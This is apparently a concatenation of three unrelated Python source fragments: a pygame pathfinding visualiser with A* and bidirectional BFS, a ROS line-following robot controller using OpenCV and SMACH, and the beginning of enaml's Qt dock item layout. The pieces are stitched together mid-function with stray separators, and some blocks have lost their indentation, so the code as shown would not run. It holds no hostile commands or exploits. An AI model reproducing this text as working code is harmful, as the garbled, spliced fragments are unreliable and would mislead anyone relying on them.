    Tk().wm_withdraw()
    messagebox.showinfo("No Solution", "There was no solution")
def heuristic(currentPosition, destinationPosition):
    """Manhattan distance between two (x, y) grid positions.

    Used by A* as an admissible estimate of the remaining distance.
    """
    x1, y1 = currentPosition
    x2, y2 = destinationPosition
    return abs(x1 - x2) + abs(y1 - y2)
def AStarAlgorithm(drawing, source, destination, map):
    """ Animated A* search from source to destination.

    Uses the Manhattan-distance heuristic() to prioritise vertices by
    fScore = gScore + heuristic.

    Args:
        drawing: zero-argument callable that redraws the grid each step.
        source, destination: grid vertex objects.
        map: 2D list of vertex objects (the grid rows).

    Returns:
        True when a path is found (after animating it and showing an info
        dialog).  When the open set empties first, shows a "No Solution"
        dialog and implicitly returns None.
    """
    # Insertion counter breaks priority ties, since vertices are not comparable.
    count = 0
    openSet = PriorityQueue()
    openSet.put((0, count, source))
    parent = {}
    gScore = {vertex: float("inf") for row in map for vertex in row}  # shortest distance between source and current vertex
    gScore[source] = 0
    fScore = {vertex: float("inf") for row in map for vertex in row}  # gScore + heuristic
    fScore[source] = heuristic(source.getPosition(), destination.getPosition())
    # Set mirror of the open set, for O(1) membership tests.
    openSetHash = {source}
    startTime = time.time()
    while not openSet.empty():
        # Keep the window responsive while the search animates.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
        current = openSet.get()[2]
        openSetHash.remove(current)
        if current == destination:
            timeTaken = time.time() - startTime
            distanceCovered = reconstructPath(parent, destination, drawing, source)
            destination.setDestination()
            message = " Speed: {timeTaken:.1f}s Distance Covered: {distance}"
            Tk().wm_withdraw()
            messagebox.showinfo("Path Found!!", message.format(timeTaken=timeTaken, distance=distanceCovered))
            return True
        # Relax each neighbour; re-queue it under its updated fScore.
        for edge in current.connections:
            temp = gScore[current] + edge.getWeight()
            if temp < gScore[edge]:
                parent[edge] = current
                gScore[edge] = temp
                fScore[edge] = temp + heuristic(edge.getPosition(), destination.getPosition())
                if edge not in openSetHash:
                    count += 1
                    openSet.put((fScore[edge], count, edge))
                    openSetHash.add(edge)
                    edge.setInQueue()
        drawing()
        if current != source:
            current.setAsVisited()
    # Open set exhausted without reaching the destination.  (The original kept
    # a 'found' flag that was never set, so the final guard was a no-op; the
    # dead flag has been removed.)
    Tk().wm_withdraw()
    messagebox.showinfo("No Solution", "There was no solution")
""" Functions for Reconstructing Paths """
# Reconstruct Path
def reconstructPath(parent, vertex, draw, source):
    """Animate the found path and return its total weight.

    Walks the parent chain from the destination back towards the source,
    marking each intermediate cell as a path vertex with a short delay so
    the path appears progressively.  Plays a success sound when the walk
    reaches the source.
    """
    travelled = 0
    vertex.setDestination()
    # loop through the vertices' parents, making a path from the destination to the source
    while vertex in parent:
        time.sleep(0.025)
        travelled += vertex.getWeight()
        vertex = parent[vertex]
        if not (vertex.isDestination() or vertex.isSource()):
            vertex.setPathVertex()
        draw()
        if vertex == source:
            playsound('sounds/success.mp3')
    return travelled
# Reconstruct a Path from bi-directional algorithm
def reconstructdirectionalPath(sourceParent, destParent, sourceCurrent, drawing, source):
    """ Animate the path found by a bi-directional search and return its weight.

    The two search frontiers met at ``sourceCurrent``.  The first loop walks
    its parent chain in ``sourceParent`` back to the source; the second walks
    the chain in ``destParent`` towards the destination.  Each step marks the
    cell as a path vertex with a short delay so the path appears progressively.

    Args:
        sourceParent: parent map built by the search growing from the source.
        destParent: parent map built by the search growing from the destination.
        sourceCurrent: the meeting vertex of the two frontiers.
        drawing: zero-argument callable that redraws the grid.
        source: the source vertex (restored to its source colour at the end).

    Returns:
        The summed weight of all vertices traversed on both halves.
    """
    current = sourceCurrent
    distanceCovered = 0
    # loop through the vertices' parents, making a path from the current vertex to the source
    while sourceCurrent in sourceParent:
        distanceCovered += sourceCurrent.getWeight()
        sourceCurrent = sourceParent[sourceCurrent]
        if sourceCurrent.isSource():
            pass
        else:
            sourceCurrent.setPathVertex()
        time.sleep(0.025)
        drawing()
        if sourceCurrent.isDestination():
            sourceCurrent.setDestination()
    # The meeting vertex itself belongs to the path.
    current.setPathVertex()
    # loop through the vertices' parents, making a path from the current vertex to the destination
    while current in destParent:
        distanceCovered += current.getWeight()
        current = destParent[current]
        if current.isSource():
            pass
        else:
            time.sleep(0.025)
            if current.isDestination():
                pass
            else:
                current.setPathVertex()
            drawing()
    # Re-assert the terminal colours, which the walk may have overwritten.
    if current.isDestination():
        current.setDestination()
    source.setSource()
    playsound('sounds/success.mp3')
    return distanceCovered
# Reconstruct a Path with Two destinations
def reconstructRoute(parent1, parent2, vertex, draw, source):
    """ Animate a two-destination route and show its total distance.

    Walks ``vertex``'s parent chain in ``parent2`` (second leg) first, then
    continues through ``parent1`` (first leg) back to the source, marking
    intermediate cells as path vertices with short delays.  Ends by playing
    a success sound and showing a dialog with the summed weight.  Unlike the
    other reconstruct helpers, this one does not return the distance.

    Args:
        parent1: parent map for the source -> first destination leg.
        parent2: parent map for the first -> second destination leg.
        vertex: the vertex to start the backwards walk from.
        draw: zero-argument callable that redraws the grid.
        source: the source vertex (restored to its source colour at the end).
    """
    distanceCovered = 0
    # loop through the vertices' parents, making a path from the current vertex to the destination
    while vertex in parent2:
        distanceCovered += vertex.getWeight()
        vertex = parent2[vertex]
        if vertex.isDestination():
            pass
        else:
            vertex.setPathVertex()
        time.sleep(0.025)
        draw()
    if vertex.isDestination():
        vertex.setDestination()
    # Brief pause between the two legs of the route.
    time.sleep(0.5)
    # loop through the vertices' parents, making a path from the current vertex to the source
    while vertex in parent1:
        distanceCovered += vertex.getWeight()
        vertex = parent1[vertex]
        if vertex.isSource():
            pass
        else:
            time.sleep(0.025)
            vertex.setPathVertex()
            draw()
    if vertex.isDestination():
        vertex.setDestination()
    source.setSource()
    playsound('sounds/success.mp3')
    message = " Distance Covered: {distance}"
    Tk().wm_withdraw()
    messagebox.showinfo("Path Found!!", message.format(distance=distanceCovered))
""" Bi-Directional Algorithms"""
# BFS Biderectional Search
def BFSBiDirectional(drawing, source, destination, map):
queue = [source]
destQueue = [destination]
sourceParent = {}
destParent = {}
sourceShortest = {vertex: float("inf") for row in map for vertex in row}
sourceShortest[source] = 0
destShortest = {vertex: float("inf") for row in map for vertex in row}
destShortest[destination] = 0
found = False
startTime = time.time()
while len(queue) != 0 and len(destQueue) != 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
destCurrent = destQueue.pop(0)
sourceCurrent = queue.pop(0)
for edge in sourceCurrent.connections:
tempScore = sourceShortest[sourceCurrent] + 1
if tempScore < sourceShortest[edge]:
sourceParent[edge] = sourceCurrent
sourceShortest[edge] = tempScore
if edge not in queue and edge != source:
queue.append(edge)
if not edge.isVisited():
edge.setInQueue()
for edge in destCurrent.connections:
tempScore = destShortest[destCurrent] + 1
if tempScore < destShortest[edge]:
destParent[edge] = destCurrent
destShortest[edge] = tempScore
if edge not in queue and edge != source:
destQueue.append(edge)
if not edge.isVisited():
edge.setInQueue()
drawing()
if sourceCurrent != source:
sourceCurrent.setAsVisited()
if destCurrent != destination:
destCurrent.setAsVisited()
if (sourceCurrent.isVisited() or sourceCurrent.isInQueue()) and sourceCurrent in destParent:
totalTime = time.time() - startTime
distanceCovered = reconstructdirectionalPath(sourceParent, | |
<filename>src/follower.py
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from sensor_msgs.msg import Joy
from kobuki_msgs.msg import Led, Sound
from geometry_msgs.msg import Twist
import cv2, cv_bridge, numpy
import smach
import smach_ros
# Module-level state shared between the image callback and the SMACH states.
# (A module-level 'global' statement is a no-op; kept for documentation value.)
global stop, donot_check_time, image_pub, err, cmd_vel_pub, bridge, stop_count, line_lost, led_pub1, led_pub2, sound_pub
'''
shape_id
0 triangle
1 square
2 circle
'''
global shape_id_counts, object_counts, chosen_shape, shape_found
shape_found = False
chosen_shape = "circle"
# Vote accumulators: each camera frame casts one vote; the winner is argmax.
shape_id_counts = {
    "task2": numpy.asarray([0, 0, 0]),
    "task3": numpy.asarray([0 ,0 ,0])
} # green, red (task 2 and 3)
object_counts = {
    "task1": numpy.asarray([0, 0, 0]), # task 1 [1obj, 2obj, 3obj]
    "task2": numpy.asarray([0, 0, 0]) # task 2 [1obj, 2obj, 3obj]
} # task 1 and 2
line_lost = False
# Number of red stop-lines crossed so far; drives state transitions in Stop.
stop_count = 0
rospy.init_node('follower')
# Steering error: white-line centroid x minus image centre (set in follow_line).
err = 0
led_pub1 = rospy.Publisher('/mobile_base/commands/led1', Led, queue_size=1)
led_pub2 = rospy.Publisher('/mobile_base/commands/led2', Led, queue_size=1)
sound_pub = rospy.Publisher('/mobile_base/commands/sound', Sound, queue_size=1)
global start, callback_state
start = True
# callback_state selects what image_callback does with each frame:
callback_state = 0
'''
0 follow line
1 task 1
2 task 2
3 task 3
'''
def joy_callback(msg):
    """Toggle the global run flag when joystick button 0 is pressed."""
    global start
    if msg.buttons[0] != 1:
        return
    rospy.loginfo("start pressed!")
    start = not start
def follow_line(image):
    """ Line-following frame handler (callback_state == 0).

    Looks for a red stop line inside a horizontal band 50-70 px above the
    bottom of the frame; when one appears (and the 5 s debounce window has
    expired) the global ``stop`` flag is set for the Go state to consume.
    Otherwise the white line's centroid in the same band is located and the
    global steering error ``err`` (centroid x minus image centre) is updated.
    Publishes the annotated frame on ``image_pub``.
    """
    global stop, donot_check_time, image_pub, err, line_lost
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    # HSV thresholds tuned for the course's white line and red stop markers.
    lower_white = numpy.array([0, 0, 242])
    upper_white = numpy.array([170, 50, 256])
    lower_red = numpy.array([130, 132, 110])
    upper_red = numpy.array([200, 256, 256])
    mask = cv2.inRange(hsv, lower_white, upper_white)
    mask_red = cv2.inRange(hsv, lower_red, upper_red)
    masked = cv2.bitwise_and(image, image, mask=mask_red)
    # image_pub.publish(bridge.cv2_to_imgmsg(masked, encoding='bgr8'))
    # check red line
    h, w, d = image.shape
    # Only examine a thin band near the bottom of the frame.
    search_top = h-70
    search_bot = h-50
    mask_red[0:search_top, 0:w] = 0
    mask_red[search_bot:h, 0:w] = 0
    M = cv2.moments(mask_red)
    # m00 > 0 means some red pixels survived the band crop; the 5 s window
    # prevents the same stop line from triggering repeatedly.
    if M['m00'] > 0 and rospy.Time.now() > donot_check_time:
        stop = True
        donot_check_time = rospy.Time.now()+rospy.Duration(5)
    if stop:
        if M['m00'] > 0:
            # Mark the red-line centroid on the published frame.
            cx = int(M['m10']/M['m00'])
            cy = int(M['m01']/M['m00'])
            cv2.circle(image, (cx, cy), 20, (0,255,0), -1)
        image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
        return
    # masked = cv2.bitwise_and(image, image, mask=mask)
    # image_pub.publish(bridge.cv2_to_imgmsg(masked, encoding='bgr8'))
    # track white line
    h, w, d = image.shape
    search_top = h-70
    search_bot = h-50
    mask[0:search_top, 0:w] = 0
    mask[search_bot:h, 0:w] = 0
    M = cv2.moments(mask)
    if M['m00'] > 0:
        line_lost = False
        cx = int(M['m10']/M['m00'])
        cy = int(M['m01']/M['m00'])
        cv2.circle(image, (cx, cy), 20, (0,0,255), -1)
        # Positive err = line is right of centre; Go steers with -err/200.
        err = cx - w/2
    else:
        line_lost = True
    image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
def display_led(count):
    """Show a count from 0-3 on the two Kobuki LEDs as a 2-bit binary value.

    led1 is the high bit and led2 the low bit; ORANGE means 1, BLACK means 0.
    Counts outside 0-3 are ignored, matching the original elif chain.
    """
    global led_pub1, led_pub2
    if count not in (0, 1, 2, 3):
        return
    high = Led.ORANGE if count >= 2 else Led.BLACK
    low = Led.ORANGE if count % 2 == 1 else Led.BLACK
    led_pub1.publish(Led(high))
    led_pub2.publish(Led(low))
def detect_1(image):
    """ Count red objects in a BGR camera frame (task 1).

    Returns (masked_image, count): the frame masked to the red regions with
    contours drawn on, and the number of sufficiently large red contours
    clamped to the range 1..3.
    """
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    lower_red = numpy.array([130, 132, 110])
    upper_red = numpy.array([200, 256, 256])
    mask_red = cv2.inRange(hsv, lower_red, upper_red)
    ret, thresh = cv2.threshold(mask_red, 127, 255, 0)
    # 9x9 averaging filter blurs the mask so fragments of one object merge.
    kernel = numpy.ones((9,9),numpy.float32)/25
    thresh = cv2.filter2D(thresh,-1,kernel)
    # NOTE(review): the 3-value return is the OpenCV 3.x findContours API;
    # OpenCV 4.x returns only 2 values — confirm the installed version.
    im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Drop tiny contours (noise).
    contours = list(filter(lambda c: c.size > 100, contours))
    cv2.drawContours(image, contours, -1, (0, 0, 255), 3)
    masked = cv2.bitwise_and(image, image, mask=mask_red)
    count = clamp_count(len(contours))
    return masked, count
def detect_2(image):
    """ Detect red objects plus one green shape in a BGR frame (task 2).

    Returns (masked_image, count, shape_id): the frame masked to the red and
    green regions, the object count clamped to 1..3, and the shape id of the
    largest green contour (see get_shape_id).
    """
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    lower_red = numpy.array([130, 132, 110])
    upper_red = numpy.array([200, 256, 256])
    lower_green = numpy.array([44, 54, 63])
    upper_green = numpy.array([88, 255, 255])
    mask_red = cv2.inRange(hsv, lower_red, upper_red)
    mask_green = cv2.inRange(hsv, lower_green, upper_green)
    ret, thresh_red = cv2.threshold(mask_red, 127, 255, 0)
    # thresh_red = mask_red
    thresh_green = mask_green # did not bother doing threshold on green
    # 3x3 averaging filter to merge nearby red fragments.
    kernel = numpy.ones((3,3),numpy.float32)/25
    thresh_red = cv2.filter2D(thresh_red,-1,kernel)
    # NOTE(review): 3-value findContours return is the OpenCV 3.x API.
    _, contours_green, hierarchy = cv2.findContours(thresh_green, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    _, contours_red, hierarchy = cv2.findContours(thresh_red, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    contours_green = list(filter(lambda c: c.size > 70, contours_green))
    contours_red = list(filter(lambda c: c.size > 40, contours_red))
    vertices = get_vertices(contours_green)
    cv2.drawContours(image, contours_green, -1, (0,255,0), 3)
    cv2.drawContours(image, contours_red, -1, (0,0,255), 3)
    mask = cv2.bitwise_or(mask_red, mask_green)
    masked = cv2.bitwise_and(image, image, mask=mask)
    # The +1 presumably counts the green object alongside the red ones — confirm.
    count = clamp_count(len(contours_red) + 1)
    return masked, count, get_shape_id(vertices)
def detect_3(image):
    """ Detect red shapes in the central strip of a BGR frame (task 3).

    Masks out the left and right fifths of the image, then finds red
    contours and classifies the largest one's shape.  Returns
    (masked_image, count, shape_id).
    """
    hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
    # lower_red = numpy.array([130, 132, 110])
    # upper_red = numpy.array([200, 256, 256])
    lower_red = numpy.array([0, 205, 38])
    upper_red = numpy.array([180, 255, 125])
    mask_red = cv2.inRange(hsv, lower_red, upper_red)
    h, w, d = image.shape
    # Keep only the middle 3/5 of the frame.  NOTE(review): w/5 relies on
    # Python 2 integer division; under Python 3 this slice index would be a
    # float and raise — confirm the target interpreter.
    mask_red[:,0:w/5] = 0
    mask_red[:,4*w/5:w] = 0
    # ret, thresh_red = cv2.threshold(mask_red, 127, 255, 0)
    thresh_red = mask_red
    kernel = numpy.ones((3,3),numpy.float32)/25
    thresh_red = cv2.filter2D(thresh_red,-1,kernel)
    # NOTE(review): 3-value findContours return is the OpenCV 3.x API.
    _, contours_red, hierarchy = cv2.findContours(thresh_red, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    contours_red = list(filter(lambda c: c.size > 40, contours_red))
    vertices = get_vertices(contours_red)
    cv2.drawContours(image, contours_red, -1, (0,0,255), 3)
    mask = mask_red
    masked = cv2.bitwise_and(image, image, mask=mask)
    count = clamp_count(len(contours_red))
    return masked, count, get_shape_id(vertices)
def clamp_count(count):
    """ Clamp a detected object count to the valid range [1, 3].

    The course always has between one and three objects, so detector noise
    outside that range is folded back to the nearest bound.
    """
    # Idiomatic clamp replaces the original if/elif chain; behaviour is identical.
    return max(1, min(count, 3))
def get_shape_id(vertices):
    """Map a polygon vertex count to a shape id.

    3 vertices -> 0 (triangle), 4 -> 1 (square), anything else -> 2 (circle).
    """
    return {3: 0, 4: 1}.get(vertices, 2)
def get_shape(shape_id):
    """Return the shape name for a shape id (inverse of get_shape_id).

    0 -> "triangle", 1 -> "square", anything else -> "circle".
    """
    names = {0: "triangle", 1: "square"}
    return names.get(shape_id, "circle")
def get_vertices(contours):
    """ Approximate the largest contour as a polygon and return its vertex count.

    Uses approxPolyDP with an epsilon of 4% of the contour perimeter, a
    common setting for coarse shape classification.  Returns 0 when
    ``contours`` is empty.
    """
    approx = []
    areas = [cv2.contourArea(c) for c in contours]
    if len(areas):
        max_index = numpy.argmax(areas)
        largest_contour = contours[max_index]
        peri = cv2.arcLength(largest_contour, True)
        approx = cv2.approxPolyDP(largest_contour, 0.04 * peri, True)
    return len(approx)
def image_callback(msg):
    """ Dispatch each camera frame according to the global callback_state.

    0: follow the line.  1-3: run the corresponding detector and accumulate
    one vote per frame into the count/shape vote tables; the SMACH states
    later pick the winner with argmax.
    """
    global callback_state
    global shape_id_counts, object_counts
    image = bridge.imgmsg_to_cv2(msg,desired_encoding='bgr8')
    if callback_state == 0:
        follow_line(image)
    elif callback_state == 1:
        image, count = detect_1(image)
        object_counts["task1"][count-1] += 1 # count -1 as index starts at 0
        image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
        # display_led(count)
    elif callback_state == 2: # reset object_counts in the state
        image, count, shape_id = detect_2(image)
        object_counts["task2"][count-1] += 1
        shape_id_counts["task2"][shape_id] += 1
        image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
        # display_led(count)
    elif callback_state == 3:
        image, count, shape_id = detect_3(image)
        shape_id_counts["task3"][shape_id] += 1
        image_pub.publish(bridge.cv2_to_imgmsg(image, encoding='bgr8'))
# ROS wiring: joystick toggle, image pipeline in/out, and velocity output.
rospy.Subscriber("/joy", Joy, joy_callback)
bridge = cv_bridge.CvBridge()
image_pub = rospy.Publisher('transformed_img', Image, queue_size=1)  # annotated debug frames
cmd_vel_pub = rospy.Publisher('cmd_vel_mux/input/teleop', Twist, queue_size=1)
image_sub = rospy.Subscriber('/camera/rgb/image_raw', Image, image_callback)
# cmd_vel_pub = rospy.Publisher('/teleop_velocity_smoother/raw_cmd_vel', Twist, queue_size=1)
# Red-line debounce deadline and the shared stop flag consumed by the Go state.
donot_check_time = rospy.Time.now()
stop = False
class Go(smach.State):
    """ SMACH state: follow the line until a red stop line sets the global
    'stop' flag, then transition to the Stop state. """
    def __init__(self):
        smach.State.__init__(self, outcomes=['stop'])
        self.twist = Twist()
        print "start"
    def execute(self, data):
        """ Drive forward, steering proportionally to the line error computed
        by follow_line; return 'stop' (and clear the flag) when flagged. """
        global stop, err, cmd_vel_pub, stop_count, start
        while not rospy.is_shutdown():
            if stop:
                stop = False
                return 'stop'
            else:
                # Proportional steering: err > 0 means the line is right of
                # centre, so turn with negative (clockwise) angular velocity.
                self.twist.linear.x = 0.2
                self.twist.angular.z = -float(err) / 200
                cmd_vel_pub.publish(self.twist)
class Stop(smach.State):
    """ SMACH state entered at each red stop line.  Counts the lines crossed
    and routes to the matching task state (1st -> task1, 3rd -> task2,
    5th -> task3); otherwise pauses briefly and resumes line following. """
    def __init__(self):
        smach.State.__init__(self, outcomes=['go', 'task1', 'task2', 'task3', 'finish'])
        self.twist = Twist()
    def execute(self, data):
        global stop, cmd_vel_pub, stop_count
        stop_count += 1
        # go a bit further
        wait_time = rospy.Time.now() + rospy.Duration(1)
        while rospy.Time.now()<wait_time:
            self.twist.linear.x = 0.2
            self.twist.angular.z = 0
            cmd_vel_pub.publish(self.twist)
        # speed = 0.2
        # while speed > 0:
        # self.twist.linear.x = 0.2
        # self.twist.angular.z = 0
        # cmd_vel_pub.publish(self.twist)
        # speed -= 0.00001
        # determine which stop line this is
        if stop_count == 1:
            return 'task1'
        elif stop_count == 3:
            return 'task2'
        elif stop_count == 5:
            # Come to a full halt for a second before task 3.
            wait_time = rospy.Time.now() + rospy.Duration(1)
            while rospy.Time.now()<wait_time:
                self.twist.linear.x = 0
                self.twist.angular.z = 0
                cmd_vel_pub.publish(self.twist)
            return 'task3'
        # NOTE(review): stop_count starts at 0 and is only incremented, so this
        # branch is unreachable and 'finish' is never returned — confirm the
        # intended terminating condition.
        elif stop_count <0:
            return 'finish'
        # regular stop
        wait_time = rospy.Time.now() + rospy.Duration(2)
        while rospy.Time.now()<wait_time:
            self.twist.linear.x = 0
            self.twist.angular.z = 0
            cmd_vel_pub.publish(self.twist)
        return 'go'
# class Task1(smach.State):
# def __init__(self):
# smach.State.__init__(self, outcomes=['go'])
# self.twist = Twist()
# def execute(self, data):
# global stop, cmd_vel_pub, callback_state, object_counts
# wait_time = rospy.Time.now() + rospy.Duration(3)
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0.2
# self.twist.angular.z = 0
# cmd_vel_pub.publish(self.twist)
# wait_time = rospy.Time.now() + rospy.Duration(1.6)
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0
# self.twist.angular.z = 1.5
# cmd_vel_pub.publish(self.twist)
# wait_time = rospy.Time.now() + rospy.Duration(20)
# callback_state = 1
# while rospy.Time.now()<wait_time:
# self.twist.linear.x = 0
# self.twist.angular.z = 0
# cmd_vel_pub.publish(self.twist)
# callback_state = 0
# wait_time = rospy.Time.now() + rospy.Duration(1.6)
# object_count = numpy.argmax(object_counts["task1"]) + 1
# print "task1" + str(object_count)
# exit()
# while rospy.Time.now()<wait_time:
# display_led(object_count)
# self.twist.linear.x = 0
# self.twist.angular.z = -1.5
# cmd_vel_pub.publish(self.twist)
# # exit()
# return 'go'
class Task1(smach.State):
    """ SMACH state for task 1: turn toward the objects, count them by
    accumulating detector votes for one second, then announce the winning
    count with beeps and LEDs while turning back. """
    def __init__(self):
        smach.State.__init__(self, outcomes=['go'])
        self.twist = Twist()
    def execute(self, data):
        global stop, cmd_vel_pub, callback_state, sound_pub
        # Drive forward for 1.5 s to line up with the viewing spot.
        wait_time = rospy.Time.now() + rospy.Duration(1.5)
        while rospy.Time.now()<wait_time:
            self.twist.linear.x = 0.2
            self.twist.angular.z = 0
            cmd_vel_pub.publish(self.twist)
        # Rotate in place (counter-clockwise) for 1.2 s to face the objects.
        wait_time = rospy.Time.now() + rospy.Duration(1.2)
        while rospy.Time.now()<wait_time:
            self.twist.linear.x = 0
            self.twist.angular.z = 1.5
            cmd_vel_pub.publish(self.twist)
        # Stand still for 1 s while image_callback (state 1) accumulates votes.
        wait_time = rospy.Time.now() + rospy.Duration(1)
        callback_state = 1
        while rospy.Time.now()<wait_time:
            self.twist.linear.x = 0
            self.twist.angular.z = 0
            cmd_vel_pub.publish(self.twist)
        callback_state = 0
        # Winning vote; +1 because index 0 holds the votes for "1 object".
        object_count = numpy.argmax(object_counts["task1"]) + 1
        for i in range(object_count):
            # wait_time_sound = rospy.Time.now() + rospy.Duration(0.5)
            # while rospy.Time.now()<wait_time_sound:
            sound_pub.publish(Sound(0))
            # Busy-wait 1 s between beeps so they are distinguishable.
            wait_time_sound = rospy.Time.now() + rospy.Duration(1)
            while rospy.Time.now()<wait_time_sound:
                continue
        # Rotate back onto the line, showing the count on the LEDs meanwhile.
        wait_time = rospy.Time.now() + rospy.Duration(1.2)
        while rospy.Time.now()<wait_time:
            display_led(object_count)
            self.twist.linear.x = 0
            self.twist.angular.z = -1.5
            cmd_vel_pub.publish(self.twist)
        return 'go'
class Task2(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['go'])
self.twist = Twist()
def execute(self, data):
global stop, cmd_vel_pub, err, line_lost, callback_state, object_counts, shape_id_counts, sound_pub, chosen_shape
print 'in task 2'
wait_time = rospy.Time.now() + rospy.Duration(1.5)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0.2
self.twist.angular.z = 0
cmd_vel_pub.publish(self.twist)
wait_time = rospy.Time.now() + rospy.Duration(1.4)
while rospy.Time.now()<wait_time:
self.twist.linear.x = 0
self.twist.angular.z = 1.5
cmd_vel_pub.publish(self.twist)
# track the line
print 'tracking line'
while (not rospy.is_shutdown()) and (not line_lost):
self.twist.linear.x = 0.2
self.twist.angular.z = -float(err) / 200
cmd_vel_pub.publish(self.twist)
# reaches the end, stop for 2 second
print | |
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from enaml.qt.QtCore import Qt, QRect, QSize, QPoint, QTimer, Signal
from enaml.qt.QtGui import QApplication, QFrame, QLayout
from .event_types import (
QDockItemEvent, DockItemShown, DockItemHidden, DockItemClosed
)
from .q_dock_tab_widget import QDockTabWidget
from .q_dock_title_bar import QDockTitleBar
from .utils import repolish
class _AlertData(object):
""" A private class which stores the data needed for item alerts.
"""
def __init__(self, timer, level, on, off, repeat, persist):
self.timer = timer
self.level = level
self.on = on
self.off = off
self.repeat = repeat
self.persist = persist
self.remaining = repeat
self.active = False
class QDockItemLayout(QLayout):
    """ A QLayout subclass for laying out a dock item.

    The layout manages at most two children: an optional title bar
    stacked above a single primary dock widget.
    """
    def __init__(self, parent=None):
        """ Initialize a QDockItemLayout.

        Parameters
        ----------
        parent : QWidget or None
            The parent widget owner of the layout.
        """
        super(QDockItemLayout, self).__init__(parent)
        # Cached size hints. An invalid QSize() means "not yet computed";
        # the caches are rebuilt lazily and cleared by invalidate().
        self._size_hint = QSize()
        self._min_size = QSize()
        self._max_size = QSize()
        self._title_bar = None
        self._dock_widget = None
    #--------------------------------------------------------------------------
    # Public API
    #--------------------------------------------------------------------------
    def titleBarWidget(self):
        """ Get the title bar widget set for the layout.

        Returns
        -------
        result : IDockItemTitleBar or None
            The title bar widget for the layout, or None if no widget
            is applied.
        """
        return self._title_bar
    def setTitleBarWidget(self, title_bar):
        """ Set the title bar widget for the layout.

        The old widget will be hidden and unparented, but not destroyed.

        Parameters
        ----------
        title_bar : IDockItemTitleBar or None
            A concrete implementor of the title bar interface, or None.
        """
        old_bar = self._title_bar
        if old_bar is not None:
            old_bar.hide()
            old_bar.setParent(None)
        self._title_bar = title_bar
        if title_bar is not None:
            title_bar.setParent(self.parentWidget())
        # Drop the cached size hints so they reflect the new title bar.
        self.invalidate()
    def dockWidget(self):
        """ Get the dock widget set for the layout.

        Returns
        -------
        result : QWidget
            The primary widget set in the dock item layout.
        """
        return self._dock_widget
    def setDockWidget(self, widget):
        """ Set the dock widget for the layout.

        The old widget will be hidden and unparented, but not destroyed.

        Parameters
        ----------
        widget : QWidget
            The widget to use as the primary content in the layout.
        """
        old_widget = self._dock_widget
        if widget is old_widget:
            return
        if old_widget is not None:
            old_widget.hide()
            old_widget.setParent(None)
        self._dock_widget = widget
        if widget is not None:
            widget.setParent(self.parentWidget())
        self.invalidate()
    #--------------------------------------------------------------------------
    # QLayout API
    #--------------------------------------------------------------------------
    def invalidate(self):
        """ Invalidate the layout.

        Resets the cached size hints so they are recomputed on the next
        call to sizeHint(), minimumSize(), or maximumSize().
        """
        super(QDockItemLayout, self).invalidate()
        self._size_hint = QSize()
        self._min_size = QSize()
        self._max_size = QSize()
    def setGeometry(self, rect):
        """ Set the geometry for the items in the layout.
        """
        super(QDockItemLayout, self).setGeometry(rect)
        title = self._title_bar
        widget = self._dock_widget
        title_rect = QRect(rect)
        widget_rect = QRect(rect)
        if title is not None and not title.isHidden():
            msh = title.minimumSizeHint()
            title_rect.setHeight(msh.height())
            # QRect.bottom() is inclusive, so the dock widget starts on
            # the pixel row just below the title bar.
            widget_rect.setTop(title_rect.bottom() + 1)
            title.setGeometry(title_rect)
        if widget is not None and not widget.isHidden():
            widget.setGeometry(widget_rect)
    def sizeHint(self):
        """ Get the size hint for the layout.
        """
        sh = self._size_hint
        if not sh.isValid():
            # Heights stack (title above widget); width is the wider
            # of the two visible children.
            width = height = 0
            title = self._title_bar
            widget = self._dock_widget
            if title is not None and not title.isHidden():
                hint = title.sizeHint()
                width += hint.width()
                height += hint.height()
            if widget is not None and not widget.isHidden():
                hint = widget.sizeHint()
                width = max(width, hint.width())
                height += hint.height()
            sh = self._size_hint = QSize(width, height)
        return sh
    def minimumSize(self):
        """ Get the minimum size for the layout.
        """
        ms = self._min_size
        if not ms.isValid():
            width = height = 0
            title = self._title_bar
            widget = self._dock_widget
            if title is not None and not title.isHidden():
                hint = title.minimumSizeHint()
                width += hint.width()
                height += hint.height()
            if widget is not None and not widget.isHidden():
                hint = widget.minimumSizeHint()
                width = max(width, hint.width())
                height += hint.height()
            ms = self._min_size = QSize(width, height)
        return ms
    def maximumSize(self):
        """ Get the maximum size for the layout.
        """
        ms = self._max_size
        if not ms.isValid():
            widget = self._dock_widget
            parent = self.parentWidget()
            # The widget's maximum size is only honored when the parent
            # item is floating; otherwise the layout is unconstrained.
            # 16777215 is Qt's QWIDGETSIZE_MAX.
            if widget is not None and parent.isFloating():
                ms = widget.maximumSize()
                title = self._title_bar
                if title is not None and not title.isHidden():
                    height = ms.height() + title.minimumSizeHint().height()
                    ms.setHeight(min(16777215, height))
            else:
                ms = QSize(16777215, 16777215)
            self._max_size = ms
        return ms
    #--------------------------------------------------------------------------
    # QLayout Abstract API
    #--------------------------------------------------------------------------
    def addItem(self, item):
        """ A required virtual method implementation.

        Adding items directly is unsupported; widgets are installed
        through the explicit setter methods.
        """
        msg = 'Use `setTitleBarWidget | setDockWidget` instead.'
        raise NotImplementedError(msg)
    def count(self):
        """ A required virtual method implementation.

